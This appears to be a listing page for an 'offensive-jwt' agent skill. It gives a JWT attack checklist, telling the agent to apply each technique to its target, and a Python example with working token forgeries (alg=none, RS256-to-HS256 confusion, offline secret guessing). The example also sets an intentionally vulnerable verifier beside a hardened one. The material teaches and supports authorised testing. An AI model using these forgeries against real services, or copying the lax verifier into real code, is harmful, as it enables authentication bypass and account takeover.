offensive-jwt


Overview

Comprehensive JWT attack checklist for offensive security engagements. Work through the steps in order, apply each technique to the current target context, and track which items have been completed.

Quick Reference: Misconfigurations to Check

  • alg set to none: the server treats the token as unsigned and skips signature verification entirely
  • Algorithm confusion (RS256 to HS256): the server accepts an HMAC-signed token whose secret is its own RSA public key
  • Weak or guessable HMAC secret: the signature can be brute-forced offline against a wordlist, after which arbitrary tokens can be forged
  • kid, jku, jwk, x5u header parameters accepted without validation: key lookup by attacker-controlled path or URL (kid injection, attacker-hosted JWKS, embedded jwk used as the verification key)
  • Expired or tampered tokens accepted by the server: exp/nbf not enforced, or the signature never checked at all
  • Sensitive data stored unencrypted in the payload: claims are only Base64URL-encoded and readable by anyone holding the token

Useful tool: jwt_tool (ticarpi/jwt_tool)

Mechanisms

JWTs (RFC 7519) consist of three Base64URL-encoded parts, header.payload.signature; the signature is computed over the first two parts joined by a dot, so any change to header or payload must be re-signed (or the signature check must be bypassed) for the token to verify.
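The three-part structure above and the first three checklist items, as one added example that is not part of the offensive-jwt skill or its repository: a stdlib-only JWT encoder/decoder, the attacker-side forgeries (alg=none, RS256-to-HS256 key confusion, offline HMAC secret guessing), and a deliberately lax verifier next to a strict one. The secret, the wordlist, the claims, the fixed clock and the PEM string are all constructed for the demonstration; the PEM is a placeholder, not a real key, and RS256 verification itself is out of scope (the strict verifier only needs to pin the algorithm to reject the confused token).

```python
"""Added example, not code from the offensive-jwt skill: JWT building blocks
plus lax vs strict verification. Standard library only."""
import base64
import hashlib
import hmac
import json

SECRET = b"s3cret"                         # constructed weak HMAC secret
PUBLIC_KEY_PEM = (                         # constructed placeholder, not a real key
    b"-----BEGIN PUBLIC KEY-----\nPLACEHOLDER-NOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"
)
NOW = 1_700_000_000                        # fixed clock so results are deterministic


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode_segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def split_jwt(token: str):
    """header.payload.signature -> (header dict, payload dict, signature bytes)."""
    h, p, s = token.split(".")
    return json.loads(b64url_decode(h)), json.loads(b64url_decode(p)), b64url_decode(s)


def sign_hs256(payload: dict, key: bytes, header=None) -> str:
    """Signing input is the ASCII of header.payload; the MAC goes in part three."""
    header = header or {"alg": "HS256", "typ": "JWT"}
    signing_input = f"{encode_segment(header)}.{encode_segment(payload)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url_encode(sig)}"


def forge_alg_none(token: str, **new_claims) -> str:
    """Attack 1: rewrite claims, set alg=none, and drop the signature."""
    _, payload, _ = split_jwt(token)
    payload.update(new_claims)
    return f"{encode_segment({'alg': 'none', 'typ': 'JWT'})}.{encode_segment(payload)}."


def forge_key_confusion(payload: dict, public_key_pem: bytes) -> str:
    """Attack 2: HMAC the token with the server's RSA *public* key bytes as secret."""
    return sign_hs256(payload, public_key_pem)


def brute_force_secret(token: str, wordlist):
    """Attack 3: offline guessing of the HMAC secret; no requests reach the server."""
    _, _, sig = split_jwt(token)
    signing_input = token.rsplit(".", 1)[0].encode()      # reuse the token's own bytes
    for guess in wordlist:
        if hmac.compare_digest(hmac.new(guess, signing_input, hashlib.sha256).digest(), sig):
            return guess
    return None


def verify_lax(token: str, key_material: bytes):
    """VULNERABLE on purpose: trusts the alg named in the header, treats 'none'
    as verified, and uses whatever key object it holds as an HMAC secret."""
    header, payload, sig = split_jwt(token)
    signing_input = token.rsplit(".", 1)[0].encode()
    if header.get("alg") == "none":
        return payload
    if header.get("alg") == "HS256":
        expected = hmac.new(key_material, signing_input, hashlib.sha256).digest()
        return payload if hmac.compare_digest(expected, sig) else None
    return None


def verify_strict(token: str, key: bytes, expected_alg: str = "HS256", now: int = NOW):
    """Hardened: the server pins the algorithm, never the token; constant-time
    compare; exp enforced. Only the HS256 path is implemented here."""
    header, payload, sig = split_jwt(token)
    if header.get("alg") != expected_alg or expected_alg != "HS256":
        return None                                       # confusion and none both stop here
    signing_input = token.rsplit(".", 1)[0].encode()
    expected = hmac.new(key, signing_input, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):
        return None
    if "exp" not in payload or payload["exp"] <= now:
        return None                                       # expired or missing exp
    return payload


if __name__ == "__main__":
    legit = sign_hs256({"sub": "alice", "role": "user", "exp": NOW + 3600}, SECRET)
    print("alg=none accepted by lax verifier:", verify_lax(forge_alg_none(legit, role="admin"), SECRET))
    print("alg=none accepted by strict verifier:", verify_strict(forge_alg_none(legit, role="admin"), SECRET))
    print("recovered secret:", brute_force_secret(legit, [b"password", b"secret", b"s3cret"]))
```

Run it directly to see the lax verifier hand back an admin payload for the unsigned token while the strict one returns None. For the key-confusion case the server that really uses RS256 must reject any token whose header is not RS256 before touching key material, which is what `expected_alg="RS256"` does in `verify_strict`; allowing the token to select the algorithm is the whole bug.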

Installs: 33
GitHub Stars: 2.3K
First Seen: May 3, 2026
offensive-jwt — snailsploit/claude-red